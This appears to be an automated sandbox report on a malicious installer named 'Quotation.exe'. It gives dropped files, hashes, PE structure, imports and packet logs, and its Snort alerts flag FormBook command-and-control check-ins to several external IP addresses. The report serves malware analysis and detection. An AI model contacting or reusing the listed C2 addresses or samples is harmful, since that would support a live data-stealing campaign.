                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...J..b.........."......:.....................@....................................Y.....`..................................................................`..h....X..........................................(....P..............(...h............................text....9.......:.................. ..`.rdata.......P.......>..............@..@.data....!...0......................@....pdata..h....`.......*..............@..@.00cfg...............D..............@..@.tls.................F..............@....rsrc................H..............@..@.reloc...............P..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Forureningsforebygget\Pegboard\percentile.dll

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\Quotation.exe
                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):102577
                                                                                                                        Entropy (8bit):5.075179901575448
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:t9H5uXFjJeEoPsznZgkZNhFdS2E0fVnSdNPfZ5+uKIu7aQzTgp37CtHRMX6NX0:tJ5wJeEoU9g0Nhav09nahfYxDRx0
                                                                                                                        MD5:3144FDFEC817D0AC6FE3F4642B70328B
                                                                                                                        SHA1:756C3513DC10CF00B517C72B2D3AB3E20895A46C
                                                                                                                        SHA-256:BF17F5B38DCF35B55B1E0FAD462D4095ABAAA4CD8F1EDBDC8657C0249EF5D4D3
                                                                                                                        SHA-512:012D9A3B88BA5D5090E8B47B49FE50E518489AB05FAAC6A1A0743F29A369B7D67F39B8E113B34740607137F2D67D75116DBE2A76E8E1DBE699BA4973F8037684
                                                                                                                        Malicious:false
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...rL.`.<........& ...$.....6......P................................................U....`... .........................................Y....................P..................`............................A..(....................................................text...............................`.P`.data...p....0....... ..............@.P..rdata..p....@......."..............@.`@.pdata.......P.......*..............@.0@.xdata..l....`......................@.0@.bss.........p........................`..edata..Y............0..............@.0@.idata...............2..............@.0..CRT....X............6..............@.@..tls.................8..............@.@..reloc..`............:..............@.0B/4...................<..............@.PB/19.....C............@..............@..B/31..........`......................@..B/45.............. ..................@..B/57.....

                                                                                                                        C:\Users\user\AppData\Local\Temp\4995H5Jfc

                                                                                                                        Download File
                                                                                                                        Process:C:\Windows\SysWOW64\control.exe
                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 5, database pages 59, cookie 0x4f, schema 4, UTF-8, version-valid-for 5
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):122880
                                                                                                                        Entropy (8bit):1.1305327154874678
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:oLt4nKTjebGAUJp/XH9euJDvphC+KRmquPWSTVumQ6:it4nsJp/39RDhw+KRmqu+cVumQ
                                                                                                                        MD5:D331C900DDE8ACB523C51D9448205C0A
                                                                                                                        SHA1:BDB3366F54876E78F76A6244EDA7A4C302FEB91D
                                                                                                                        SHA-256:F199798DF1C37E3A8F6FFF1E208F083CF687F5C6A220DCAD42BB68F2120181CD
                                                                                                                        SHA-512:415E4F4F26D4F861063676EA786C2941DB8DB7E248E32D84595BC7D531CE19669AFDCB447BC18B0B723839984CD15269FF6E89EBCD168D8EBD0EC7AF86CC92E7
                                                                                                                        Malicious:false
                                                                                                                        Preview:SQLite format 3......@ .......;...........O......................................................O}...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                        C:\Users\user\AppData\Local\Temp\nsi3181.tmp\System.dll

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\Quotation.exe
                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):11776
                                                                                                                        Entropy (8bit):5.854901984552606
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:qPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4U:F7VpNo8gmOyRsVc4
                                                                                                                        MD5:0063D48AFE5A0CDC02833145667B6641
                                                                                                                        SHA1:E7EB614805D183ECB1127C62DECB1A6BE1B4F7A8
                                                                                                                        SHA-256:AC9DFE3B35EA4B8932536ED7406C29A432976B685CC5322F94EF93DF920FEDE7
                                                                                                                        SHA-512:71CBBCAEB345E09306E368717EA0503FE8DF485BE2E95200FEBC61BCD8BA74FB4211CD263C232F148C0123F6C6F2E3FD4EA20BDECC4070F5208C35C6920240F0
                                                                                                                        Malicious:false
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L......]...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                        Static File Info

                                                                                                                        General

                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                        Entropy (8bit):7.974128626441633
                                                                                                                        TrID:
                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                        File name:Quotation.exe
                                                                                                                        File size:693360
                                                                                                                        MD5:8a81948116d2ea79bee1d261733dba89
                                                                                                                        SHA1:5cf4113debe6d37bd770d8d3870647b8bac082a3
                                                                                                                        SHA256:5a64a3fd65f7176b7ad623893e3cb573af13eb51850f8243a1951884eee757a9
                                                                                                                        SHA512:bc5707d66c79d3f01e29227514bc1fa938e0165b000b94efefdb3c8d2849e2ede859c037b103b9f85365cd178c179171e8e7dec071c71ba61b6e919d1eba8841
                                                                                                                        SSDEEP:12288:QV5CSEuHKGQYpovMKcZnY4UKwp7hVOZCbgjvwf:QV51qFMccUNEZCbgjY
                                                                                                                        TLSH:7BE42317B19382C3D5E749F53E698B3683B33F570D22878FF2AA37B19974914812A427
                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.w.F.*.....F...v...F...@...F.Rich..F.........PE..L......].................`..........52.......p....@

                                                                                                                        File Icon

                                                                                                                        Icon Hash:84c8c888cac88800

                                                                                                                        Static PE Info

                                                                                                                        General

                                                                                                                        Entrypoint:0x403235
                                                                                                                        Entrypoint Section:.text
                                                                                                                        Digitally signed:true
                                                                                                                        Imagebase:0x400000
                                                                                                                        Subsystem:windows gui
                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                        Time Stamp:0x5DF6D4E3 [Mon Dec 16 00:50:43 2019 UTC]
                                                                                                                        TLS Callbacks:
                                                                                                                        CLR (.Net) Version:
                                                                                                                        OS Version Major:4
                                                                                                                        OS Version Minor:0
                                                                                                                        File Version Major:4
                                                                                                                        File Version Minor:0
                                                                                                                        Subsystem Version Major:4
                                                                                                                        Subsystem Version Minor:0
                                                                                                                        Import Hash:e9c0657252137ac61c1eeeba4c021000

                                                                                                                        Authenticode Signature

                                                                                                                        Signature Valid:false
                                                                                                                        Signature Issuer:E=Hjertecenteret@Brahminee.Sta, OU="Slewingslews Styrborde Nadines ", O=Demystify, L=Parlier, S=California, C=US
                                                                                                                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                        Error Number:-2146762487
                                                                                                                        Not Before, Not After
                                                                                                                        • 15/08/2022 02:11:02 14/08/2025 02:11:02
                                                                                                                        Subject Chain
                                                                                                                        • E=Hjertecenteret@Brahminee.Sta, OU="Slewingslews Styrborde Nadines ", O=Demystify, L=Parlier, S=California, C=US
                                                                                                                        Version:3
                                                                                                                        Thumbprint MD5:62DE8C7E9FEEF9C1BE32A539EE8C3042
                                                                                                                        Thumbprint SHA-1:3D54D8A3F7094698631D99D96688154B999E2C8B
                                                                                                                        Thumbprint SHA-256:A645406AC892515D81FC329AB84ADDF8C558F2770665B05F23CFC9F4C322D1DC
                                                                                                                        Serial:3F5567173D0043C048AB0658FB8124DCFF6DDE12

                                                                                                                        Entrypoint Preview

                                                                                                                        Instruction
                                                                                                                        sub esp, 00000184h
                                                                                                                        push ebx
                                                                                                                        push esi
                                                                                                                        push edi
                                                                                                                        xor ebx, ebx
                                                                                                                        push 00008001h
                                                                                                                        mov dword ptr [esp+18h], ebx
                                                                                                                        mov dword ptr [esp+10h], 00409198h
                                                                                                                        mov dword ptr [esp+20h], ebx
                                                                                                                        mov byte ptr [esp+14h], 00000020h
                                                                                                                        call dword ptr [004070A0h]
                                                                                                                        call dword ptr [0040709Ch]
                                                                                                                        and eax, BFFFFFFFh
                                                                                                                        cmp ax, 00000006h
                                                                                                                        mov dword ptr [0042370Ch], eax
                                                                                                                        je 00007F5C392A7CB3h
                                                                                                                        push ebx
                                                                                                                        call 00007F5C392AAD9Bh
                                                                                                                        cmp eax, ebx
                                                                                                                        je 00007F5C392A7CA9h
                                                                                                                        push 00000C00h
                                                                                                                        call eax
                                                                                                                        mov esi, 00407298h
                                                                                                                        push esi
                                                                                                                        call 00007F5C392AAD17h
                                                                                                                        push esi
                                                                                                                        call dword ptr [00407098h]
                                                                                                                        lea esi, dword ptr [esi+eax+01h]
                                                                                                                        cmp byte ptr [esi], bl
                                                                                                                        jne 00007F5C392A7C8Dh
                                                                                                                        push 0000000Ah
                                                                                                                        call 00007F5C392AAD6Fh
                                                                                                                        push 00000008h
                                                                                                                        call 00007F5C392AAD68h
                                                                                                                        push 00000006h
                                                                                                                        mov dword ptr [00423704h], eax
                                                                                                                        call 00007F5C392AAD5Ch
                                                                                                                        cmp eax, ebx
                                                                                                                        je 00007F5C392A7CB1h
                                                                                                                        push 0000001Eh
                                                                                                                        call eax
                                                                                                                        test eax, eax
                                                                                                                        je 00007F5C392A7CA9h
                                                                                                                        or byte ptr [0042370Fh], 00000040h
                                                                                                                        push ebp
                                                                                                                        call dword ptr [00407040h]
                                                                                                                        push ebx
                                                                                                                        call dword ptr [00407284h]
                                                                                                                        mov dword ptr [004237D8h], eax
                                                                                                                        push ebx
                                                                                                                        lea eax, dword ptr [esp+38h]
                                                                                                                        push 00000160h
                                                                                                                        push eax
                                                                                                                        push ebx
                                                                                                                        push 0041ECC8h
                                                                                                                        call dword ptr [00407178h]
                                                                                                                        push 00409188h

                                                                                                                        Rich Headers

                                                                                                                        Programming Language:
                                                                                                                        • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                        Data Directories

                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x74300xa0.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x360000x4568.rsrc
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0xa72280x2248
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x70000x294.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                        Sections

                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                        .text0x10000x5f7d0x6000False0.6680094401041666data6.466064816043304IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                        .rdata0x70000x123e0x1400False0.4275390625data4.989734782278587IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                        .data0x90000x1a8180x400False0.638671875data5.130817636118804IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                        .ndata0x240000x120000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                        .rsrc0x360000x45680x4600False0.42265625data5.512282206254712IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                        Resources

                                                                                                                        NameRVASizeTypeLanguageCountry
                                                                                                                        RT_ICON0x362680x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States
                                                                                                                        RT_ICON0x388100x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States
                                                                                                                        RT_ICON0x398b80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishUnited States
                                                                                                                        RT_DIALOG0x39d200x100dataEnglishUnited States
                                                                                                                        RT_DIALOG0x39e200x11cdataEnglishUnited States
                                                                                                                        RT_DIALOG0x39f400xc4dataEnglishUnited States
                                                                                                                        RT_DIALOG0x3a0080x60dataEnglishUnited States
                                                                                                                        RT_GROUP_ICON0x3a0680x30dataEnglishUnited States
                                                                                                                        RT_VERSION0x3a0980x190dataEnglishUnited States
                                                                                                                        RT_MANIFEST0x3a2280x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States

                                                                                                                        Imports

                                                                                                                        DLLImport
                                                                                                                        KERNEL32.dllGetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetFileAttributesA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileTime, GetFileAttributesA, SetCurrentDirectoryA, MoveFileA, GetFullPathNameA, GetShortPathNameA, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, DeleteFileA, FindFirstFileA, FindNextFileA, FindClose, SetFilePointer, GetPrivateProfileStringA, WritePrivateProfileStringA, MulDiv, MultiByteToWideChar, FreeLibrary, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
                                                                                                                        USER32.dllGetSystemMenu, SetClassLongA, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, LoadImageA, CreateDialogParamA, SetTimer, SetWindowTextA, SetForegroundWindow, ShowWindow, SetWindowLongA, SendMessageTimeoutA, FindWindowExA, IsWindow, AppendMenuA, TrackPopupMenu, CreatePopupMenu, DrawTextA, EndPaint, DestroyWindow, wsprintfA, PostQuitMessage
                                                                                                                        GDI32.dllSelectObject, SetTextColor, SetBkMode, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, GetDeviceCaps, SetBkColor
                                                                                                                        SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
                                                                                                                        ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                                                                        COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                        ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                                                                        Possible Origin

                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                        EnglishUnited States

                                                                                                                        Network Behavior

                                                                                                                        Snort IDS Alerts

                                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                        192.168.11.202.57.90.1649916802031449 03/20/23-15:06:08.714083TCP2031449ET TROJAN FormBook CnC Checkin (GET)4991680192.168.11.202.57.90.16
                                                                                                                        192.168.11.20199.192.26.3549888802031412 03/20/23-15:02:43.756679TCP2031412ET TROJAN FormBook CnC Checkin (GET)4988880192.168.11.20199.192.26.35
                                                                                                                        192.168.11.202.57.90.1649916802031412 03/20/23-15:06:08.714083TCP2031412ET TROJAN FormBook CnC Checkin (GET)4991680192.168.11.202.57.90.16
                                                                                                                        192.168.11.20199.192.26.3549888802031453 03/20/23-15:02:43.756679TCP2031453ET TROJAN FormBook CnC Checkin (GET)4988880192.168.11.20199.192.26.35
                                                                                                                        192.168.11.2034.117.168.23349897802031453 03/20/23-15:03:18.139935TCP2031453ET TROJAN FormBook CnC Checkin (GET)4989780192.168.11.2034.117.168.233
                                                                                                                        192.168.11.2034.117.168.23349897802031412 03/20/23-15:03:18.139935TCP2031412ET TROJAN FormBook CnC Checkin (GET)4989780192.168.11.2034.117.168.233
                                                                                                                        192.168.11.202.57.90.1649916802031453 03/20/23-15:06:08.714083TCP2031453ET TROJAN FormBook CnC Checkin (GET)4991680192.168.11.202.57.90.16
                                                                                                                        192.168.11.20199.192.26.3549888802031449 03/20/23-15:02:43.756679TCP2031449ET TROJAN FormBook CnC Checkin (GET)4988880192.168.11.20199.192.26.35
                                                                                                                        192.168.11.2034.117.168.23349897802031449 03/20/23-15:03:18.139935TCP2031449ET TROJAN FormBook CnC Checkin (GET)4989780192.168.11.2034.117.168.233

                                                                                                                        Network Port Distribution

                                                                                                                        TCP Packets

                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Mar 20, 2023 14:59:24.033808947 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:24.033935070 CET44349854162.240.73.101192.168.11.20
                                                                                                                        Mar 20, 2023 14:59:24.034235001 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:24.060362101 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:24.060436964 CET44349854162.240.73.101192.168.11.20
                                                                                                                        Mar 20, 2023 14:59:24.427198887 CET44349854162.240.73.101192.168.11.20
                                                                                                                        Mar 20, 2023 14:59:24.427412987 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:24.508608103 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:24.508704901 CET44349854162.240.73.101192.168.11.20
                                                                                                                        Mar 20, 2023 14:59:24.509831905 CET44349854162.240.73.101192.168.11.20
                                                                                                                        Mar 20, 2023 14:59:24.509990931 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:24.512862921 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:24.556482077 CET44349854162.240.73.101192.168.11.20
                                                                                                                        Mar 20, 2023 14:59:24.778146982 CET44349854162.240.73.101192.168.11.20
                                                                                                                        Mar 20, 2023 14:59:24.778325081 CET44349854162.240.73.101192.168.11.20
                                                                                                                        Mar 20, 2023 14:59:24.778374910 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:24.778425932 CET44349854162.240.73.101192.168.11.20
                                                                                                                        Mar 20, 2023 14:59:24.778567076 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:24.778614998 CET44349854162.240.73.101192.168.11.20
                                                                                                                        Mar 20, 2023 14:59:24.778783083 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:24.966623068 CET44349854162.240.73.101192.168.11.20
                                                                                                                        Mar 20, 2023 14:59:24.966803074 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:24.966898918 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:24.967082977 CET44349854162.240.73.101192.168.11.20
                                                                                                                        Mar 20, 2023 14:59:24.967226028 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:24.967226028 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:24.967276096 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:24.967276096 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:24.967324972 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:24.967325926 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:24.967458010 CET44349854162.240.73.101192.168.11.20
                                                                                                                        Mar 20, 2023 14:59:24.967648029 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:24.967648029 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:24.967648029 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:24.967648029 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:24.967648029 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:24.967648029 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:25.038048029 CET44349854162.240.73.101192.168.11.20
                                                                                                                        Mar 20, 2023 14:59:25.038404942 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:25.038405895 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:25.145059109 CET44349854162.240.73.101192.168.11.20
                                                                                                                        Mar 20, 2023 14:59:25.145308971 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:25.145541906 CET44349854162.240.73.101192.168.11.20
                                                                                                                        Mar 20, 2023 14:59:25.145730019 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:25.145730972 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:25.145847082 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:25.146064997 CET44349854162.240.73.101192.168.11.20
                                                                                                                        Mar 20, 2023 14:59:25.146250963 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:25.146250963 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:25.146545887 CET44349854162.240.73.101192.168.11.20
                                                                                                                        Mar 20, 2023 14:59:25.146800041 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:25.146908045 CET44349854162.240.73.101192.168.11.20
                                                                                                                        Mar 20, 2023 14:59:25.147145033 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:25.147195101 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:25.172271967 CET44349854162.240.73.101192.168.11.20
                                                                                                                        Mar 20, 2023 14:59:25.172553062 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:25.172553062 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:25.324282885 CET44349854162.240.73.101192.168.11.20
                                                                                                                        Mar 20, 2023 14:59:25.324558020 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:25.324558973 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:25.324791908 CET44349854162.240.73.101192.168.11.20
                                                                                                                        Mar 20, 2023 14:59:25.324982882 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:25.325077057 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:25.325248003 CET44349854162.240.73.101192.168.11.20
                                                                                                                        Mar 20, 2023 14:59:25.325452089 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:25.325453043 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:25.325793028 CET44349854162.240.73.101192.168.11.20
                                                                                                                        Mar 20, 2023 14:59:25.326028109 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:25.326433897 CET44349854162.240.73.101192.168.11.20
                                                                                                                        Mar 20, 2023 14:59:25.326648951 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:25.326648951 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:25.326991081 CET44349854162.240.73.101192.168.11.20
                                                                                                                        Mar 20, 2023 14:59:25.327177048 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:25.327271938 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:25.327522993 CET44349854162.240.73.101192.168.11.20
                                                                                                                        Mar 20, 2023 14:59:25.327728033 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:25.327728987 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:25.327786922 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:25.328250885 CET44349854162.240.73.101192.168.11.20
                                                                                                                        Mar 20, 2023 14:59:25.328428984 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:25.328510046 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:25.328537941 CET44349854162.240.73.101192.168.11.20
                                                                                                                        Mar 20, 2023 14:59:25.328687906 CET44349854162.240.73.101192.168.11.20
                                                                                                                        Mar 20, 2023 14:59:25.328700066 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:25.328701019 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:25.328805923 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:25.328820944 CET44349854162.240.73.101192.168.11.20
                                                                                                                        Mar 20, 2023 14:59:25.328887939 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:25.328887939 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:25.328901052 CET44349854162.240.73.101192.168.11.20
                                                                                                                        Mar 20, 2023 14:59:25.328984022 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:25.328989983 CET44349854162.240.73.101192.168.11.20
                                                                                                                        Mar 20, 2023 14:59:25.329138994 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:25.349490881 CET44349854162.240.73.101192.168.11.20
                                                                                                                        Mar 20, 2023 14:59:25.349739075 CET44349854162.240.73.101192.168.11.20
                                                                                                                        Mar 20, 2023 14:59:25.349828959 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:25.349863052 CET44349854162.240.73.101192.168.11.20
                                                                                                                        Mar 20, 2023 14:59:25.349932909 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:25.349932909 CET49854443192.168.11.20162.240.73.101
                                                                                                                        Mar 20, 2023 14:59:25.349980116 CET44349854162.240.73.101192.168.11.20

                                                                                                                        UDP Packets

                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Mar 20, 2023 14:59:23.986933947 CET5597953192.168.11.201.1.1.1
                                                                                                                        Mar 20, 2023 14:59:24.022195101 CET53559791.1.1.1192.168.11.20
                                                                                                                        Mar 20, 2023 15:00:57.209255934 CET6482453192.168.11.201.1.1.1
                                                                                                                        Mar 20, 2023 15:00:57.344244003 CET53648241.1.1.1192.168.11.20
                                                                                                                        Mar 20, 2023 15:01:12.579010010 CET5617153192.168.11.201.1.1.1
                                                                                                                        Mar 20, 2023 15:01:12.820903063 CET53561711.1.1.1192.168.11.20
